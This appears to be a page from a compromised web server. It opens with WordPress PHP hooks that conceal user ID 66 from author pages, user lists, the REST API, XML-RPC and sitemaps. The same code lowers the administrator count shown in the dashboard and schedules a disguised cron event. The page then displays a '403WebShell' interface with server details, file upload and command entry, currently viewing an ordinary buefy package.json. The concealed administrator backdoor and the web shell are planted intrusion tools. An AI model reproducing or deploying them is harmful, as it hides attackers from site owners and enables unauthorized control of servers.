add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/jungly/node_modules/buefy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/jungly/node_modules/buefy/package.json
{
  "name": "buefy",
  "version": "0.8.20",
  "homepage": "https://buefy.org",
  "description": "Lightweight UI components for Vue.js based on Bulma",
  "author": "Rafael Beraldo <rafael.pimpa@gmail.com>",
  "maintainers": [
    "Walter Tommasi <tommsi20@gmail.com>"
  ],
  "license": "MIT",
  "main": "dist/cjs/index.js",
  "module": "dist/esm/index.js",
  "unpkg": "dist/buefy.min.js",
  "typings": "types/index.d.ts",
  "sideEffects": [
    "*.css",
    "*.scss"
  ],
  "files": [
    "dist",
    "src",
    "types/*.d.ts"
  ],
  "repository": {
    "type": "git",
    "url": "https://github.com/buefy/buefy.git"
  },
  "bugs": {
    "url": "https://github.com/buefy/buefy/issues"
  },
  "vetur": {
    "tags": "dist/vetur/tags.json",
    "attributes": "dist/vetur/attributes.json"
  },
  "scripts": {
    "dev": "node build/dev-server.js",
    "start": "node build/dev-server.js",
    "lint": "eslint --ext .js,.vue src docs",
    "lint:fix": "eslint --ext .js,.vue src docs --fix",
    "lint:staged": "lint-staged",
    "unit": "jest --runInBand",
    "test": "npm run lint && npm run unit",
    "test:watch": "npm run unit -- --watchAll",
    "build:js": "rollup -c && rollup -c --environment MINIFY",
    "build:js:watch": "rollup -c --watch",
    "build:scss": "node-sass --output-style expanded src/scss/buefy-build.scss | node ./build/banner.js > dist/buefy.css && cleancss -o dist/buefy.min.css dist/buefy.css",
    "build:scss:watch": "node-sass src/scss/buefy-build.scss --w",
    "build:lib": "npm run build:js && npm run build:scss && npm run vetur && copyfiles --flat helper-json/*.json dist/vetur",
    "build:lib:watch": "concurrently \"npm run build:js:watch\" \"npm run build:scss:watch \" ",
    "build:docs": "node build/build.js && copyfiles --flat netlify.toml dist-docs",
    "build": "npm run build:lib && npm run build:docs",
    "cov": "./node_modules/codcov/bin/codcov",
    "vetur": "node -r esm build/vetur.js"
  },
  "keywords": [
    "bulma",
    "vue",
    "vuejs",
    "vue-bulma",
    "components"
  ],
  "dependencies": {
    "bulma": "0.7.5"
  },
  "peerDependencies": {
    "vue": "^2.5.18"
  },
  "devDependencies": {
    "@applitools/eyes-cypress": "3.7.5",
    "@babel/core": "7.3.4",
    "@babel/plugin-syntax-dynamic-import": "7.2.0",
    "@babel/preset-env": "7.3.4",
    "@fortawesome/fontawesome-free": "5.3.1",
    "@mdi/font": "4.8.95",
    "@vue/test-utils": "1.0.0-beta.29",
    "all-contributors-cli": "6.14.0",
    "autoprefixer": "7.1.1",
    "axios": "0.18.1",
    "babel-core": "6.25.0",
    "babel-eslint": "7.1.1",
    "babel-jest": "22.1.0",
    "babel-loader": "7.1.2",
    "babel-plugin-transform-runtime": "6.22.0",
    "babel-preset-env": "1.3.2",
    "babel-preset-stage-2": "6.22.0",
    "babel-register": "6.22.0",
    "bulma-css-vars": "^0.4.3",
    "chalk": "1.1.3",
    "clean-css-cli": "4.3.0",
    "cleave.js": "1.0.1",
    "clipboard": "1.7.1",
    "codecov": "3.6.5",
    "connect-history-api-fallback": "1.3.0",
    "copy-webpack-plugin": "4.3.1",
    "copyfiles": "2.2.0",
    "cross-env": "4.0.0",
    "cross-spawn": "5.0.1",
    "css-loader": "0.28.0",
    "cypress": "3.4.1",
    "eslint": "4.18.2",
    "eslint-config-buefy": "0.0.3",
    "esm": "3.2.25",
    "eventsource-polyfill": "0.9.6",
    "express": "4.14.1",
    "extract-text-webpack-plugin": "3.0.2",
    "file-loader": "0.11.1",
    "font-awesome": "4.7.0",
    "friendly-errors-webpack-plugin": "1.6.1",
    "highlight.js": "9.12.0",
    "html-webpack-plugin": "2.30.1",
    "http-proxy-middleware": "0.17.3",
    "jest": "23.5.0",
    "jest-serializer-vue": "0.3.0",
    "lint-staged": "6.1.1",
    "node-sass": "4.11.0",
    "opn": "4.0.2",
    "optimize-css-assets-webpack-plugin": "3.2.0",
    "optimize-js-plugin": "0.0.4",
    "ora": "1.2.0",
    "pre-commit": "1.2.2",
    "prerender-spa-plugin": "3.4.0",
    "raw-loader": "0.5.1",
    "rimraf": "2.6.0",
    "rollup": "1.17.0",
    "rollup-copy-plugin": "0.1.0",
    "rollup-plugin-babel": "4.3.2",
    "rollup-plugin-commonjs": "9.2.1",
    "rollup-plugin-node-resolve": "4.0.1",
    "rollup-plugin-replace": "2.1.0",
    "rollup-plugin-terser": "4.0.4",
    "rollup-plugin-vue": "5.0.0",
    "sass-loader": "6.0.6",
    "scrollreveal": "3.3.6",
    "semver": "5.3.0",
    "shelljs": "0.8.3",
    "sinon": "7.5.0",
    "sortablejs": "1.7.0",
    "uglifyjs-webpack-plugin": "1.2.5",
    "url-loader": "0.5.8",
    "vee-validate": "2.1.0-beta.9",
    "vue": "2.5.18",
    "vue-analytics": "4.1.3",
    "vue-jest": "2.5.0",
    "vue-loader": "12.1.0",
    "vue-progressbar": "0.7.2",
    "vue-router": "2.3.1",
    "vue-style-loader": "3.0.1",
    "vue-template-compiler": "2.5.18",
    "webpack": "3.10.0",
    "webpack-bundle-analyzer": "2.9.2",
    "webpack-dev-server": "2.11.1",
    "webpack-hot-middleware": "2.21.0",
    "webpack-merge": "4.1.2"
  },
  "lint-staged": {
    "*.{vue,js}": [
      "lint --fix",
      "git add"
    ]
  },
  "pre-commit": "lint:staged",
  "engines": {
    "node": ">= 4.0.0",
    "npm": ">= 3.0.0"
  },
  "browserslist": [
    "> 1%",
    "last 2 versions",
    "not ie <= 8"
  ]
}

Youez - 2016 - github.com/yon3zu
LinuXploit